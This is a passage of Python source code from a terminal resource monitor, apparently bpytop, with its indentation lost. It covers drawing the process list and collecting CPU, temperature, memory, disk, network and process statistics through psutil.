out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif cls.selected > 0 and cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count == 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in it's own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
else:
cls.collect_queue = list(cls.__subclasses__())
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], text=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", text=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], text=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = True if cls.sensor_method else False
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False)))
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(round(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if hasattr(psutil.cpu_freq(), "current"):
cls.cpu_freq = round(psutil.cpu_freq().current)
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in os.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3]
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int
cores: List[int] = []
cpu_type: str = ""
if cls.sensor_method == "psutil":
try:
for name, entries in psutil.sensors_temperatures().items():
for entry in entries:
if entry.label.startswith(("Package", "Tdie")) and hasattr(entry, "current") and round(entry.current) > 0:
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
if not cls.cpu_temp_high:
if hasattr(entry, "high") and entry.high: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if hasattr(entry, "critical") and entry.critical: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0:
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high:
if hasattr(entry, "high") and entry.high: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if hasattr(entry, "critical") and entry.critical: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if len(cores) < THREADS:
if cpu_type == "intel" or (cpu_type == "other" and len(cores) == THREADS // 2):
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
elif cpu_type == "ryzen" or cpu_type == "other":
cls.cpu_temp[0].append(temp)
if len(cores) < 1: cores.append(temp)
z = 1
for t in cores:
try:
for i in range(THREADS // len(cores)):
cls.cpu_temp[z + i].append(t)
z += i
except IndexError:
break
if cls.cpu_temp[0]:
for n in range(1, len(cls.cpu_temp)):
if len(cls.cpu_temp[n]) != len(cls.cpu_temp[n-1]):
cls.cpu_temp[n] = cls.cpu_temp[n//2].copy()
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
#CONFIG.check_temp = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], text=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", text=True).split()]
if len(cores) < THREADS:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", text=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], text=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
for n in range(THREADS + 1):
cls.cpu_temp[n].append(temp)
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
io_error: bool = False
old_disks: List[str] = []
excludes: List[str] = ["squashfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string: str
u_percent: int
disk_list: List[str] = []
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=True if SYSTEM == "Linux" else False, nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
for disk in psutil.disk_partitions():
disk_io = None
io_string = ""
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
while disk_name in disk_list: disk_name += "_"
disk_list += [disk_name]
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk_name.endswith(filtering)) or (filter_exclude and disk_name.endswith(filtering))):
continue
#elif filtering and disk_name.endswith(filtering)
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
pass
u_percent = round(disk_u.percent)
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM == "Linux":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if dev_name.startswith("md"):
try:
dev_name = dev_name[:dev_name.index("p")]
except:
pass
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp))
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp))
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if MemBox.disks_width > 30:
if disk_read > 0:
io_string += f'▲{floating_humanizer(disk_read, short=True)} '
if disk_write > 0:
io_string += f'▼{floating_humanizer(disk_write, short=True)}'
elif disk_read + disk_write > 0:
io_string += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if disk_list != cls.old_disks:
MemBox.redraw = True
cls.old_disks = disk_list.copy()
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[netword device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
sync_top: int = 0
sync_string: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
@classmethod
def switch(cls, key: str):
if len(cls.nics) < 2: return
cls.nic_i += +1 if key == "n" else -1
if cls.nic_i >= len(cls.nics): cls.nic_i = 0
elif cls.nic_i < 0: cls.nic_i = len(cls.nics) - 1
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat or not up_stat[cls.nic].isup:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
pass
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processess with pid, name, arguments, threads, username, memory percent and cpu percent'''
if Box.stat_mode: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: str = cls.search_filter
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
for s in search.split(","):
if s.strip() in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd,
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
